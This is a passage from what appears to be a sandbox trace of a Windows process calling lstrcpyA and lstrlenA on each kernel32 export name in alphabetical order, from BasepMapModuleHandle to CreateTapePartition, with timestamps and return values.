lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.864] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.864] lstrlenA (lpString="BEEP") returned 4 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.864] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.864] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.864] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.864] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.864] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.864] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.864] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.864] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.864] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.864] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.864] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.864] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.864] lstrlenA (lpString="CANCELIO") returned 8 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.865] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.865] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.865] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.865] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.865] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.865] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.865] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.865] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.865] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.865] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.865] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.865] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.865] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.865] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.865] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.865] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.865] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.865] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.865] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.866] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.866] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.866] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.866] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.866] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.866] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.866] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.866] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.866] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.866] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.866] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.866] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.866] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.866] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.866] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.866] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.866] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.866] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.866] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.867] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.867] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.867] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.867] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.867] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.867] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.867] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.867] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.867] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.867] lstrlenA (lpString="COPYFILEA") returned 9 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.867] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.867] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.867] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.867] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.867] lstrlenA (lpString="COPYFILEW") returned 9 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.867] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.867] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.867] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.867] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.868] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.868] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.868] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.868] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.868] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.868] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.868] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.868] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.868] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.868] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.868] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.868] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.868] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.868] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.868] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.868] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.868] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.868] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.868] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.868] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.869] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.869] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.869] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.869] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.869] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.869] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.869] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.869] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.869] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.869] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.869] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.869] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.869] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.869] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.869] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.869] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.869] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.869] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.869] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.870] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.870] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.870] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.870] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.870] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.870] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.870] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.870] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.870] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.870] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.870] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.870] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.870] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.870] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.870] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.870] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.870] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.870] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.870] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.870] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.871] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.871] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.871] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.871] lstrlenA 